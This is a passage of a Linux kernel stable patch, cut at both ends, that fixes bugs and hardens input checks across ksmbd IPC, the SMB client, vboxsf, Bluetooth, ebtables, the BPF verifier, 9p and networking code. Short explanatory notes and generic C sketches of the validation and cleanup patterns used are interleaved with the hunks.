+@@ -1410,7 +1410,7 @@ smb2_close_getattr(const unsigned int xid, struct cifs_tcon *tcon,
+ 	rc = __SMB2_close(xid, tcon, cfile->fid.persistent_fid,
+ 		   cfile->fid.volatile_fid, &file_inf);
+ 	if (rc)
+-		return;
++		return rc;
+ 
+ 	inode = d_inode(cfile->dentry);
+ 
+@@ -1436,6 +1436,7 @@ smb2_close_getattr(const unsigned int xid, struct cifs_tcon *tcon,
+ 
+ 	/* End of file and Attributes should not have to be updated on close */
+ 	spin_unlock(&inode->i_lock);
++	return rc;
+ }
+ 
+ static int
+@@ -2436,6 +2437,8 @@ smb2_is_network_name_deleted(char *buf, struct TCP_Server_Info *server)
+ 
+ 	spin_lock(&cifs_tcp_ses_lock);
+ 	list_for_each_entry(ses, &pserver->smb_ses_list, smb_ses_list) {
++		if (cifs_ses_exiting(ses))
++			continue;
+ 		list_for_each_entry(tcon, &ses->tcon_list, tcon_list) {
+ 			if (tcon->tid == le32_to_cpu(shdr->Id.SyncId.TreeId)) {
+ 				spin_lock(&tcon->tc_lock);
+diff --git a/fs/smb/client/smb2pdu.c b/fs/smb/client/smb2pdu.c
+index 4c1231496a725..cc425a616899a 100644
+--- a/fs/smb/client/smb2pdu.c
++++ b/fs/smb/client/smb2pdu.c
+@@ -3452,9 +3452,9 @@ __SMB2_close(const unsigned int xid, struct cifs_tcon *tcon,
+ 			memcpy(&pbuf->network_open_info,
+ 			       &rsp->network_open_info,
+ 			       sizeof(pbuf->network_open_info));
++		atomic_dec(&tcon->num_remote_opens);
+ 	}
+ 
+-	atomic_dec(&tcon->num_remote_opens);
+ close_exit:
+ 	SMB2_close_free(&rqst);
+ 	free_rsp_buf(resp_buftype, rsp);
+diff --git a/fs/smb/server/ksmbd_netlink.h b/fs/smb/server/ksmbd_netlink.h
+index 0ebf91ffa2361..4464a62228cf3 100644
+--- a/fs/smb/server/ksmbd_netlink.h
++++ b/fs/smb/server/ksmbd_netlink.h
+@@ -166,7 +166,8 @@ struct ksmbd_share_config_response {
+ 	__u16	force_uid;
+ 	__u16	force_gid;
+ 	__s8	share_name[KSMBD_REQ_MAX_SHARE_NAME];
+-	__u32	reserved[112];		/* Reserved room */
++	__u32	reserved[111];		/* Reserved room */
++	__u32	payload_sz;
+ 	__u32	veto_list_sz;
+ 	__s8	____payload[];
+ };
+diff --git a/fs/smb/server/mgmt/share_config.c b/fs/smb/server/mgmt/share_config.c
+index 328a412259dc1..a2f0a2edceb8a 100644
+--- a/fs/smb/server/mgmt/share_config.c
++++ b/fs/smb/server/mgmt/share_config.c
+@@ -158,7 +158,12 @@ static struct ksmbd_share_config *share_config_request(struct unicode_map *um,
+ 	share->name = kstrdup(name, GFP_KERNEL);
+ 
+ 	if (!test_share_config_flag(share, KSMBD_SHARE_FLAG_PIPE)) {
+-		share->path = kstrdup(ksmbd_share_config_path(resp),
++		int path_len = PATH_MAX;
++
++		if (resp->payload_sz)
++			path_len = resp->payload_sz - resp->veto_list_sz;
++
++		share->path = kstrndup(ksmbd_share_config_path(resp), path_len,
+ 				      GFP_KERNEL);
+ 		if (share->path)
+ 			share->path_sz = strlen(share->path);
+diff --git a/fs/smb/server/smb2ops.c b/fs/smb/server/smb2ops.c
+index 27a9dce3e03ab..8600f32c981a1 100644
+--- a/fs/smb/server/smb2ops.c
++++ b/fs/smb/server/smb2ops.c
+@@ -228,6 +228,11 @@ void init_smb3_0_server(struct ksmbd_conn *conn)
+ 	    conn->cli_cap & SMB2_GLOBAL_CAP_ENCRYPTION)
+ 		conn->vals->capabilities |= SMB2_GLOBAL_CAP_ENCRYPTION;
+ 
++	if (server_conf.flags & KSMBD_GLOBAL_FLAG_SMB2_ENCRYPTION ||
++	    (!(server_conf.flags & KSMBD_GLOBAL_FLAG_SMB2_ENCRYPTION_OFF) &&
++	     conn->cli_cap & SMB2_GLOBAL_CAP_ENCRYPTION))
++		conn->vals->capabilities |= SMB2_GLOBAL_CAP_ENCRYPTION;
++
+ 	if (server_conf.flags & KSMBD_GLOBAL_FLAG_SMB3_MULTICHANNEL)
+ 		conn->vals->capabilities |= SMB2_GLOBAL_CAP_MULTI_CHANNEL;
+ }
+@@ -275,11 +280,6 @@ int init_smb3_11_server(struct ksmbd_conn *conn)
+ 		conn->vals->capabilities |= SMB2_GLOBAL_CAP_LEASING |
+ 			SMB2_GLOBAL_CAP_DIRECTORY_LEASING;
+ 
+-	if (server_conf.flags & KSMBD_GLOBAL_FLAG_SMB2_ENCRYPTION ||
+-	    (!(server_conf.flags & KSMBD_GLOBAL_FLAG_SMB2_ENCRYPTION_OFF) &&
+-	     conn->cli_cap & SMB2_GLOBAL_CAP_ENCRYPTION))
+-		conn->vals->capabilities |= SMB2_GLOBAL_CAP_ENCRYPTION;
+-
+ 	if (server_conf.flags & KSMBD_GLOBAL_FLAG_SMB3_MULTICHANNEL)
+ 		conn->vals->capabilities |= SMB2_GLOBAL_CAP_MULTI_CHANNEL;
+ 
+diff --git a/fs/smb/server/smb2pdu.c b/fs/smb/server/smb2pdu.c
+index 39fc078284c8e..c02b1772cb807 100644
+--- a/fs/smb/server/smb2pdu.c
++++ b/fs/smb/server/smb2pdu.c
+@@ -5579,8 +5579,9 @@ static int smb2_rename(struct ksmbd_work *work,
+ 	if (!file_info->ReplaceIfExists)
+ 		flags = RENAME_NOREPLACE;
+ 
+-	smb_break_all_levII_oplock(work, fp, 0);
+ 	rc = ksmbd_vfs_rename(work, &fp->filp->f_path, new_name, flags);
++	if (!rc)
++		smb_break_all_levII_oplock(work, fp, 0);
+ out:
+ 	kfree(new_name);
+ 	return rc;
+diff --git a/fs/smb/server/transport_ipc.c b/fs/smb/server/transport_ipc.c
+index f29bb03f0dc47..8752ac82c557b 100644
+--- a/fs/smb/server/transport_ipc.c
++++ b/fs/smb/server/transport_ipc.c
+@@ -65,6 +65,7 @@ struct ipc_msg_table_entry {
+ 	struct hlist_node	ipc_table_hlist;
+ 
+ 	void			*response;
++	unsigned int		msg_sz;
+ };
+ 
+ static struct delayed_work ipc_timer_work;
+@@ -275,6 +276,7 @@ static int handle_response(int type, void *payload, size_t sz)
+ 		}
+ 
+ 		memcpy(entry->response, payload, sz);
++		entry->msg_sz = sz;
+ 		wake_up_interruptible(&entry->wait);
+ 		ret = 0;
+ 		break;
+@@ -453,6 +455,34 @@ static int ipc_msg_send(struct ksmbd_ipc_msg *msg)
+ 	return ret;
+ }
+ 
++static int ipc_validate_msg(struct ipc_msg_table_entry *entry)
++{
++	unsigned int msg_sz = entry->msg_sz;
++
++	if (entry->type == KSMBD_EVENT_RPC_REQUEST) {
++		struct ksmbd_rpc_command *resp = entry->response;
++
++		msg_sz = sizeof(struct ksmbd_rpc_command) + resp->payload_sz;
++	} else if (entry->type == KSMBD_EVENT_SPNEGO_AUTHEN_REQUEST) {
++		struct ksmbd_spnego_authen_response *resp = entry->response;
++
++		msg_sz = sizeof(struct ksmbd_spnego_authen_response) +
++				resp->session_key_len + resp->spnego_blob_len;
++	} else if (entry->type == KSMBD_EVENT_SHARE_CONFIG_REQUEST) {
++		struct ksmbd_share_config_response *resp = entry->response;
++
++		if (resp->payload_sz) {
++			if (resp->payload_sz < resp->veto_list_sz)
++				return -EINVAL;
++
++			msg_sz = sizeof(struct ksmbd_share_config_response) +
++					resp->payload_sz;
++		}
++	}
++
++	return entry->msg_sz != msg_sz ? -EINVAL : 0;
++}
++
+ static void *ipc_msg_send_request(struct ksmbd_ipc_msg *msg, unsigned int handle)
+ {
+ 	struct ipc_msg_table_entry entry;
+@@ -477,6 +507,13 @@ static void *ipc_msg_send_request(struct ksmbd_ipc_msg *msg, unsigned int handle
+ 	ret = wait_event_interruptible_timeout(entry.wait,
+ 					       entry.response != NULL,
+ 					       IPC_WAIT_TIMEOUT);
++	if (entry.response) {
++		ret = ipc_validate_msg(&entry);
++		if (ret) {
++			kvfree(entry.response);
++			entry.response = NULL;
++		}
++	}
+ out:
+ 	down_write(&ipc_msg_table_lock);
+ 	hash_del(&entry.ipc_table_hlist);
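
handle_response() now records how many bytes actually arrived (entry->msg_sz), and ipc_validate_msg() recomputes the size each response type claims for itself, rejecting the reply before any caller parses it; the share_config hunk earlier applies the same distrust by bounding the path copy with kstrndup(). The shape check, reduced to a self-contained sketch with a made-up layout:

    #include <errno.h>
    #include <stddef.h>

    /* Hypothetical variable-length response: a fixed header declaring its
     * own payload size, followed by that many bytes. */
    struct resp_hdr {
            unsigned int payload_sz;
            unsigned int veto_list_sz;  /* must fit inside the payload */
            char payload[];
    };

    static int validate_resp(const struct resp_hdr *r, size_t received)
    {
            if (r->payload_sz && r->payload_sz < r->veto_list_sz)
                    return -EINVAL;     /* inner sizes inconsistent */
            if (received != sizeof(*r) + r->payload_sz)
                    return -EINVAL;     /* claimed size != bytes received */
            return 0;
    }
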
+diff --git a/fs/vboxsf/super.c b/fs/vboxsf/super.c
+index d2f6df69f6110..74952e58cca06 100644
+--- a/fs/vboxsf/super.c
++++ b/fs/vboxsf/super.c
+@@ -151,7 +151,7 @@ static int vboxsf_fill_super(struct super_block *sb, struct fs_context *fc)
+ 		if (!sbi->nls) {
+ 			vbg_err("vboxsf: Count not load '%s' nls\n", nls_name);
+ 			err = -EINVAL;
+-			goto fail_free;
++			goto fail_destroy_idr;
+ 		}
+ 	}
+ 
+@@ -224,6 +224,7 @@ static int vboxsf_fill_super(struct super_block *sb, struct fs_context *fc)
+ 		ida_simple_remove(&vboxsf_bdi_ida, sbi->bdi_id);
+ 	if (sbi->nls)
+ 		unload_nls(sbi->nls);
++fail_destroy_idr:
+ 	idr_destroy(&sbi->ino_idr);
+ 	kfree(sbi);
+ 	return err;
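
The vboxsf fix is a classic unwind-ladder bug: the nls-load failure jumped to an error label that also freed a bdi id that had not been allocated yet. Adding fail_destroy_idr gives that failure its own entry point, undoing only what exists so far. The pattern in general (all names hypothetical):

    /* Later labels undo more; a failure at step N jumps to the label
     * that cleans up steps 1..N-1 and nothing else. */
    static int demo_setup(struct demo *d)
    {
            int err;

            err = init_table(d);            /* step 1 */
            if (err)
                    return err;             /* nothing to undo yet */

            err = load_charset(d);          /* step 2 */
            if (err)
                    goto fail_table;        /* undo step 1 only */

            err = register_dev(d);          /* step 3 */
            if (err)
                    goto fail_charset;      /* undo steps 2, then 1 */

            return 0;

    fail_charset:
            unload_charset(d);
    fail_table:
            destroy_table(d);
            return err;
    }
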
+diff --git a/include/kvm/arm_pmu.h b/include/kvm/arm_pmu.h
+index 96b192139a23a..6196b71c5eb58 100644
+--- a/include/kvm/arm_pmu.h
++++ b/include/kvm/arm_pmu.h
+@@ -85,7 +85,7 @@ void kvm_vcpu_pmu_restore_host(struct kvm_vcpu *vcpu);
+  */
+ #define kvm_pmu_update_vcpu_events(vcpu)				\
+ 	do {								\
+-		if (!has_vhe() && kvm_vcpu_has_pmu(vcpu))		\
++		if (!has_vhe() && kvm_arm_support_pmu_v3())		\
+ 			vcpu->arch.pmu.events = *kvm_get_pmu_events();	\
+ 	} while (0)
+ 
+diff --git a/include/linux/device.h b/include/linux/device.h
+index 5520bb546a4ac..f88b498ee9da4 100644
+--- a/include/linux/device.h
++++ b/include/linux/device.h
+@@ -1099,6 +1099,7 @@ void device_link_del(struct device_link *link);
+ void device_link_remove(void *consumer, struct device *supplier);
+ void device_links_supplier_sync_state_pause(void);
+ void device_links_supplier_sync_state_resume(void);
++void device_link_wait_removal(void);
+ 
+ extern __printf(3, 4)
+ int dev_err_probe(const struct device *dev, int err, const char *fmt, ...);
+diff --git a/include/linux/secretmem.h b/include/linux/secretmem.h
+index 988528b5da438..48ffe325184c0 100644
+--- a/include/linux/secretmem.h
++++ b/include/linux/secretmem.h
+@@ -14,10 +14,10 @@ static inline bool page_is_secretmem(struct page *page)
+ 	 * Using page_mapping() is quite slow because of the actual call
+ 	 * instruction and repeated compound_head(page) inside the
+ 	 * page_mapping() function.
+-	 * We know that secretmem pages are not compound and LRU so we can
++	 * We know that secretmem pages are not compound, so we can
+ 	 * save a couple of cycles here.
+ 	 */
+-	if (PageCompound(page) || !PageLRU(page))
++	if (PageCompound(page))
+ 		return false;
+ 
+ 	mapping = (struct address_space *)
+diff --git a/include/linux/skbuff.h b/include/linux/skbuff.h
+index c30d419ebf545..c4a8520dc748f 100644
+--- a/include/linux/skbuff.h
++++ b/include/linux/skbuff.h
+@@ -745,8 +745,6 @@ typedef unsigned char *sk_buff_data_t;
+  *	@list: queue head
+  *	@ll_node: anchor in an llist (eg socket defer_list)
+  *	@sk: Socket we are owned by
+- *	@ip_defrag_offset: (aka @sk) alternate use of @sk, used in
+- *		fragmentation management
+  *	@dev: Device we arrived on/are leaving by
+  *	@dev_scratch: (aka @dev) alternate use of @dev when @dev would be %NULL
+  *	@cb: Control buffer. Free for use by every layer. Put private vars here
+@@ -870,10 +868,7 @@ struct sk_buff {
+ 		struct llist_node	ll_node;
+ 	};
+ 
+-	union {
+-		struct sock		*sk;
+-		int			ip_defrag_offset;
+-	};
++	struct sock		*sk;
+ 
+ 	union {
+ 		ktime_t		tstamp;
+diff --git a/include/linux/udp.h b/include/linux/udp.h
+index efd9ab6df3797..79a4eae6f1f8f 100644
+--- a/include/linux/udp.h
++++ b/include/linux/udp.h
+@@ -140,6 +140,24 @@ static inline void udp_cmsg_recv(struct msghdr *msg, struct sock *sk,
+ 	}
+ }
+ 
++DECLARE_STATIC_KEY_FALSE(udp_encap_needed_key);
++#if IS_ENABLED(CONFIG_IPV6)
++DECLARE_STATIC_KEY_FALSE(udpv6_encap_needed_key);
++#endif
++
++static inline bool udp_encap_needed(void)
++{
++	if (static_branch_unlikely(&udp_encap_needed_key))
++		return true;
++
++#if IS_ENABLED(CONFIG_IPV6)
++	if (static_branch_unlikely(&udpv6_encap_needed_key))
++		return true;
++#endif
++
++	return false;
++}
++
+ static inline bool udp_unexpected_gso(struct sock *sk, struct sk_buff *skb)
+ {
+ 	if (!skb_is_gso(skb))
+@@ -153,6 +171,16 @@ static inline bool udp_unexpected_gso(struct sock *sk, struct sk_buff *skb)
+ 	    !udp_test_bit(ACCEPT_FRAGLIST, sk))
+ 		return true;
+ 
++	/* GSO packets lacking the SKB_GSO_UDP_TUNNEL/_CSUM bits might still
++	 * land in a tunnel as the socket check in udp_gro_receive cannot be
++	 * foolproof.
++	 */
++	if (udp_encap_needed() &&
++	    READ_ONCE(udp_sk(sk)->encap_rcv) &&
++	    !(skb_shinfo(skb)->gso_type &
++	      (SKB_GSO_UDP_TUNNEL | SKB_GSO_UDP_TUNNEL_CSUM)))
++		return true;
++
+ 	return false;
+ }
+ 
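
udp_encap_needed_key is a static branch: until the first encapsulating socket flips it, udp_encap_needed() compiles down to a patched-out no-op, so the extra tunnel test added to udp_unexpected_gso() costs nothing on hosts that never use UDP tunnels. A minimal sketch of the jump-label API itself (module-style demo, not the UDP code):

    #include <linux/jump_label.h>

    DEFINE_STATIC_KEY_FALSE(demo_feature_key);

    static void handle_feature(void)
    {
            /* hypothetical slow path */
    }

    /* Fast path: folds to a NOP until the key is enabled, then to a
     * jump; there is no load-and-compare at runtime. */
    static void fast_path(void)
    {
            if (static_branch_unlikely(&demo_feature_key))
                    handle_feature();
    }

    /* The first user enables the branch; the last one disables it. */
    static void feature_enable(void)  { static_branch_inc(&demo_feature_key); }
    static void feature_disable(void) { static_branch_dec(&demo_feature_key); }
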
+diff --git a/include/net/bluetooth/hci.h b/include/net/bluetooth/hci.h
+index c69e09909449f..09bc4bf805c62 100644
+--- a/include/net/bluetooth/hci.h
++++ b/include/net/bluetooth/hci.h
+@@ -175,6 +175,15 @@ enum {
+ 	 */
+ 	HCI_QUIRK_USE_BDADDR_PROPERTY,
+ 
++	/* When this quirk is set, the Bluetooth Device Address provided by
++	 * the 'local-bd-address' fwnode property is incorrectly specified in
++	 * big-endian order.
++	 *
++	 * This quirk can be set before hci_register_dev is called or
++	 * during the hdev->setup vendor callback.
++	 */
++	HCI_QUIRK_BDADDR_PROPERTY_BROKEN,
++
+ 	/* When this quirk is set, the duplicate filtering during
+ 	 * scanning is based on Bluetooth devices addresses. To allow
+ 	 * RSSI based updates, restart scanning if needed.
+diff --git a/include/net/inet_connection_sock.h b/include/net/inet_connection_sock.h
+index 080968d6e6c53..8132f330306db 100644
+--- a/include/net/inet_connection_sock.h
++++ b/include/net/inet_connection_sock.h
+@@ -172,6 +172,7 @@ void inet_csk_init_xmit_timers(struct sock *sk,
+ 			       void (*delack_handler)(struct timer_list *),
+ 			       void (*keepalive_handler)(struct timer_list *));
+ void inet_csk_clear_xmit_timers(struct sock *sk);
++void inet_csk_clear_xmit_timers_sync(struct sock *sk);
+ 
+ static inline void inet_csk_schedule_ack(struct sock *sk)
+ {
+diff --git a/include/net/sock.h b/include/net/sock.h
+index 579732d47dfc4..60577751ea9e8 100644
+--- a/include/net/sock.h
++++ b/include/net/sock.h
+@@ -1833,6 +1833,13 @@ static inline void sock_owned_by_me(const struct sock *sk)
+ #endif
+ }
+ 
++static inline void sock_not_owned_by_me(const struct sock *sk)
++{
++#ifdef CONFIG_LOCKDEP
++	WARN_ON_ONCE(lockdep_sock_is_held(sk) && debug_locks);
++#endif
++}
++
+ static inline bool sock_owned_by_user(const struct sock *sk)
+ {
+ 	sock_owned_by_me(sk);
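
sock_not_owned_by_me() is the mirror image of sock_owned_by_me() just below it: with CONFIG_LOCKDEP it warns once if the caller still holds the socket lock at a point where it must already have been dropped (say, right before a blocking wait), and it compiles away entirely otherwise. A hedged usage sketch (the function and the wait condition are hypothetical):

    #include <linux/wait.h>
    #include <net/sock.h>

    /* The wait below can block indefinitely, so the socket lock must
     * have been released by now; lockdep builds warn if it was not. */
    static void demo_wait_for_peer(struct sock *sk, wait_queue_head_t *wq,
                                   bool *done)
    {
            sock_not_owned_by_me(sk);   /* no-op without CONFIG_LOCKDEP */
            wait_event(*wq, READ_ONCE(*done));
    }
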
+diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
+index 1a29ac4db6eae..27cc6e3db5a86 100644
+--- a/kernel/bpf/verifier.c
++++ b/kernel/bpf/verifier.c
+@@ -4965,6 +4965,11 @@ static int check_stack_access_within_bounds(
+ 	err = check_stack_slot_within_bounds(min_off, state, type);
+ 	if (!err && max_off > 0)
+ 		err = -EINVAL; /* out of stack access into non-negative offsets */
++	if (!err && access_size < 0)
++		/* access_size should not be negative (or overflow an int); others checks
++		 * along the way should have prevented such an access.
++		 */
++		err = -EFAULT; /* invalid negative access size; integer overflow? */
+ 
+ 	if (err) {
+ 		if (tnum_is_const(reg->var_off)) {
+diff --git a/mm/memory.c b/mm/memory.c
+index fb83cf56377ab..301c74c444385 100644
+--- a/mm/memory.c
++++ b/mm/memory.c
+@@ -5593,6 +5593,10 @@ int follow_phys(struct vm_area_struct *vma,
+ 		goto out;
+ 	pte = *ptep;
+ 
++	/* Never return PFNs of anon folios in COW mappings. */
++	if (vm_normal_folio(vma, address, pte))
++		goto unlock;
++
+ 	if ((flags & FOLL_WRITE) && !pte_write(pte))
+ 		goto unlock;
+ 
+diff --git a/net/9p/client.c b/net/9p/client.c
+index 84b93b04d0f06..1d9a8a1f3f107 100644
+--- a/net/9p/client.c
++++ b/net/9p/client.c
+@@ -1581,7 +1581,7 @@ p9_client_read_once(struct p9_fid *fid, u64 offset, struct iov_iter *to,
+ 		received = rsize;
+ 	}
+ 
+-	p9_debug(P9_DEBUG_9P, "<<< RREAD count %d\n", count);
++	p9_debug(P9_DEBUG_9P, "<<< RREAD count %d\n", received);
+ 
+ 	if (non_zc) {
+ 		int n = copy_to_iter(dataptr, received, to);
+@@ -1607,9 +1607,6 @@ p9_client_write(struct p9_fid *fid, u64 offset, struct iov_iter *from, int *err)
+ 	int total = 0;
+ 	*err = 0;
+ 
+-	p9_debug(P9_DEBUG_9P, ">>> TWRITE fid %d offset %llu count %zd\n",
+-		 fid->fid, offset, iov_iter_count(from));
+-
+ 	while (iov_iter_count(from)) {
+ 		int count = iov_iter_count(from);
+ 		int rsize = fid->iounit;
+@@ -1621,6 +1618,9 @@ p9_client_write(struct p9_fid *fid, u64 offset, struct iov_iter *from, int *err)
+ 		if (count < rsize)
+ 			rsize = count;
+ 
++		p9_debug(P9_DEBUG_9P, ">>> TWRITE fid %d offset %llu count %d (/%d)\n",
++			 fid->fid, offset, rsize, count);
++
+ 		/* Don't bother zerocopy for small IO (< 1024) */
+ 		if (clnt->trans_mod->zc_request && rsize > 1024) {
+ 			req = p9_client_zc_rpc(clnt, P9_TWRITE, NULL, from, 0,
+@@ -1648,7 +1648,7 @@ p9_client_write(struct p9_fid *fid, u64 offset, struct iov_iter *from, int *err)
+ 			written = rsize;
+ 		}
+ 
+-		p9_debug(P9_DEBUG_9P, "<<< RWRITE count %d\n", count);
++		p9_debug(P9_DEBUG_9P, "<<< RWRITE count %d\n", written);
+ 
+ 		p9_req_put(clnt, req);
+ 		iov_iter_revert(from, count - written - iov_iter_count(from));
+diff --git a/net/bluetooth/hci_debugfs.c b/net/bluetooth/hci_debugfs.c
+index 6124b3425f351..c9400a7d93d7b 100644
+--- a/net/bluetooth/hci_debugfs.c
++++ b/net/bluetooth/hci_debugfs.c
+@@ -217,10 +217,12 @@ static int conn_info_min_age_set(void *data, u64 val)
+ {
+ 	struct hci_dev *hdev = data;
+ 
+-	if (val == 0 || val > hdev->conn_info_max_age)
++	hci_dev_lock(hdev);
++	if (val == 0 || val > hdev->conn_info_max_age) {
++		hci_dev_unlock(hdev);
+ 		return -EINVAL;
++	}
+ 
+-	hci_dev_lock(hdev);
+ 	hdev->conn_info_min_age = val;
+ 	hci_dev_unlock(hdev);
+ 
+@@ -245,10 +247,12 @@ static int conn_info_max_age_set(void *data, u64 val)
+ {
+ 	struct hci_dev *hdev = data;
+ 
+-	if (val == 0 || val < hdev->conn_info_min_age)
++	hci_dev_lock(hdev);
++	if (val == 0 || val < hdev->conn_info_min_age) {
++		hci_dev_unlock(hdev);
+ 		return -EINVAL;
++	}
+ 
+-	hci_dev_lock(hdev);
+ 	hdev->conn_info_max_age = val;
+ 	hci_dev_unlock(hdev);
+ 
+@@ -566,10 +570,12 @@ static int sniff_min_interval_set(void *data, u64 val)
+ {
+ 	struct hci_dev *hdev = data;
+ 
+-	if (val == 0 || val % 2 || val > hdev->sniff_max_interval)
++	hci_dev_lock(hdev);
++	if (val == 0 || val % 2 || val > hdev->sniff_max_interval) {
++		hci_dev_unlock(hdev);
+ 		return -EINVAL;
++	}
+ 
+-	hci_dev_lock(hdev);
+ 	hdev->sniff_min_interval = val;
+ 	hci_dev_unlock(hdev);
+ 
+@@ -594,10 +600,12 @@ static int sniff_max_interval_set(void *data, u64 val)
+ {
+ 	struct hci_dev *hdev = data;
+ 
+-	if (val == 0 || val % 2 || val < hdev->sniff_min_interval)
++	hci_dev_lock(hdev);
++	if (val == 0 || val % 2 || val < hdev->sniff_min_interval) {
++		hci_dev_unlock(hdev);
+ 		return -EINVAL;
++	}
+ 
+-	hci_dev_lock(hdev);
+ 	hdev->sniff_max_interval = val;
+ 	hci_dev_unlock(hdev);
+ 
+@@ -849,10 +857,12 @@ static int conn_min_interval_set(void *data, u64 val)
+ {
+ 	struct hci_dev *hdev = data;
+ 
+-	if (val < 0x0006 || val > 0x0c80 || val > hdev->le_conn_max_interval)
++	hci_dev_lock(hdev);
++	if (val < 0x0006 || val > 0x0c80 || val > hdev->le_conn_max_interval) {
++		hci_dev_unlock(hdev);
+ 		return -EINVAL;
++	}
+ 
+-	hci_dev_lock(hdev);
+ 	hdev->le_conn_min_interval = val;
+ 	hci_dev_unlock(hdev);
+ 
+@@ -877,10 +887,12 @@ static int conn_max_interval_set(void *data, u64 val)
+ {
+ 	struct hci_dev *hdev = data;
+ 
+-	if (val < 0x0006 || val > 0x0c80 || val < hdev->le_conn_min_interval)
++	hci_dev_lock(hdev);
++	if (val < 0x0006 || val > 0x0c80 || val < hdev->le_conn_min_interval) {
++		hci_dev_unlock(hdev);
+ 		return -EINVAL;
++	}
+ 
+-	hci_dev_lock(hdev);
+ 	hdev->le_conn_max_interval = val;
+ 	hci_dev_unlock(hdev);
+ 
+@@ -989,10 +1001,12 @@ static int adv_min_interval_set(void *data, u64 val)
+ {
+ 	struct hci_dev *hdev = data;
+ 
+-	if (val < 0x0020 || val > 0x4000 || val > hdev->le_adv_max_interval)
++	hci_dev_lock(hdev);
++	if (val < 0x0020 || val > 0x4000 || val > hdev->le_adv_max_interval) {
++		hci_dev_unlock(hdev);
+ 		return -EINVAL;
++	}
+ 
+-	hci_dev_lock(hdev);
+ 	hdev->le_adv_min_interval = val;
+ 	hci_dev_unlock(hdev);
+ 
+@@ -1017,10 +1031,12 @@ static int adv_max_interval_set(void *data, u64 val)
+ {
+ 	struct hci_dev *hdev = data;
+ 
+-	if (val < 0x0020 || val > 0x4000 || val < hdev->le_adv_min_interval)
++	hci_dev_lock(hdev);
++	if (val < 0x0020 || val > 0x4000 || val < hdev->le_adv_min_interval) {
++		hci_dev_unlock(hdev);
+ 		return -EINVAL;
++	}
+ 
+-	hci_dev_lock(hdev);
+ 	hdev->le_adv_max_interval = val;
+ 	hci_dev_unlock(hdev);
+ 
+diff --git a/net/bluetooth/hci_event.c b/net/bluetooth/hci_event.c
+index b150dee88f35c..bc14223f66937 100644
+--- a/net/bluetooth/hci_event.c
++++ b/net/bluetooth/hci_event.c
+@@ -3234,6 +3234,31 @@ static void hci_conn_complete_evt(struct hci_dev *hdev, void *data,
+ 		if (test_bit(HCI_ENCRYPT, &hdev->flags))
+ 			set_bit(HCI_CONN_ENCRYPT, &conn->flags);
+ 
++		/* "Link key request" completed ahead of "connect request" completes */
++		if (ev->encr_mode == 1 && !test_bit(HCI_CONN_ENCRYPT, &conn->flags) &&
++		    ev->link_type == ACL_LINK) {
++			struct link_key *key;
++			struct hci_cp_read_enc_key_size cp;
++
++			key = hci_find_link_key(hdev, &ev->bdaddr);
++			if (key) {
++				set_bit(HCI_CONN_ENCRYPT, &conn->flags);
++
++				if (!(hdev->commands[20] & 0x10)) {
++					conn->enc_key_size = HCI_LINK_KEY_SIZE;
++				} else {
++					cp.handle = cpu_to_le16(conn->handle);
++					if (hci_send_cmd(hdev, HCI_OP_READ_ENC_KEY_SIZE,
++							 sizeof(cp), &cp)) {
++						bt_dev_err(hdev, "sending read key size failed");
++						conn->enc_key_size = HCI_LINK_KEY_SIZE;
++					}
++				}
++
++				hci_encrypt_cfm(conn, ev->status);
++			}
++		}
++
+ 		/* Get remote features */
+ 		if (conn->type == ACL_LINK) {
+ 			struct hci_cp_read_remote_features cp;
+diff --git a/net/bluetooth/hci_sync.c b/net/bluetooth/hci_sync.c
+index 7e64cf880f9f1..e24b211b10ff5 100644
+--- a/net/bluetooth/hci_sync.c
++++ b/net/bluetooth/hci_sync.c
+@@ -3293,7 +3293,10 @@ static void hci_dev_get_bd_addr_from_property(struct hci_dev *hdev)
+ 	if (ret < 0 || !bacmp(&ba, BDADDR_ANY))
+ 		return;
+ 
+-	bacpy(&hdev->public_addr, &ba);
++	if (test_bit(HCI_QUIRK_BDADDR_PROPERTY_BROKEN, &hdev->quirks))
++		baswap(&hdev->public_addr, &ba);
++	else
++		bacpy(&hdev->public_addr, &ba);
+ }
+ 
+ struct hci_init_stage {
+diff --git a/net/bridge/netfilter/ebtables.c b/net/bridge/netfilter/ebtables.c
+index aa23479b20b2a..ed62c1026fe93 100644
+--- a/net/bridge/netfilter/ebtables.c
++++ b/net/bridge/netfilter/ebtables.c
+@@ -1111,6 +1111,8 @@ static int do_replace(struct net *net, sockptr_t arg, unsigned int len)
+ 	struct ebt_table_info *newinfo;
+ 	struct ebt_replace tmp;
+ 
++	if (len < sizeof(tmp))
++		return -EINVAL;
+ 	if (copy_from_sockptr(&tmp, arg, sizeof(tmp)) != 0)
+ 		return -EFAULT;
+ 
+@@ -1423,6 +1425,8 @@ static int update_counters(struct net *net, sockptr_t arg, unsigned int len)
+ {
+ 	struct ebt_replace hlp;
+ 
++	if (len < sizeof(hlp))
++		return -EINVAL;
+ 	if (copy_from_sockptr(&hlp, arg, sizeof(hlp)))
+ 		return -EFAULT;
+ 
+@@ -2352,6 +2356,8 @@ static int compat_update_counters(struct net *net, sockptr_t arg,
+ {
+ 	struct compat_ebt_replace hlp;
+ 
++	if (len < sizeof(hlp))
++		return -EINVAL;
+ 	if (copy_from_sockptr(&hlp, arg, sizeof(hlp)))
+ 		return -EFAULT;
+ 
+diff --git a/net/core/gro.c b/net/core/gro.c
+index 352f966cb1dac..47118e97ecfdd 100644
+--- a/net/core/gro.c
++++ b/net/core/gro.c
+@@ -252,8 +252,9 @@ int skb_gro_receive(struct sk_buff *p, struct sk_buff *skb)
+ 	}
+ 
+ merge:
+-	/* sk owenrship - if any - completely transferred to the aggregated packet */
++	/* sk ownership - if any - completely transferred to the aggregated packet */
+ 	skb->destructor = NULL;
++	skb->sk = NULL;
+ 	delta_truesize = skb->truesize;
+ 	if (offset > headlen) {
+ 		unsigned int eat = offset - headlen;
+diff --git a/net/core/sock_map.c b/net/core/sock_map.c
+index 91140bc0541f3..aa7ff6a464291 100644
+--- a/net/core/sock_map.c
++++ b/net/core/sock_map.c
+@@ -413,6 +413,9 @@ static int __sock_map_delete(struct bpf_stab *stab, struct sock *sk_test,
+ 	struct sock *sk;
+ 	int err = 0;
+ 
++	if (irqs_disabled())
++		return -EOPNOTSUPP; /* locks here are hardirq-unsafe */
++
+ 	raw_spin_lock_bh(&stab->lock);
+ 	sk = *psk;
+ 	if (!sk_test || sk_test == sk)
+@@ -926,6 +929,9 @@ static int sock_hash_delete_elem(struct bpf_map *map, void *key)
+ 	struct bpf_shtab_elem *elem;
+ 	int ret = -ENOENT;
+ 
++	if (irqs_disabled())
++		return -EOPNOTSUPP; /* locks here are hardirq-unsafe */
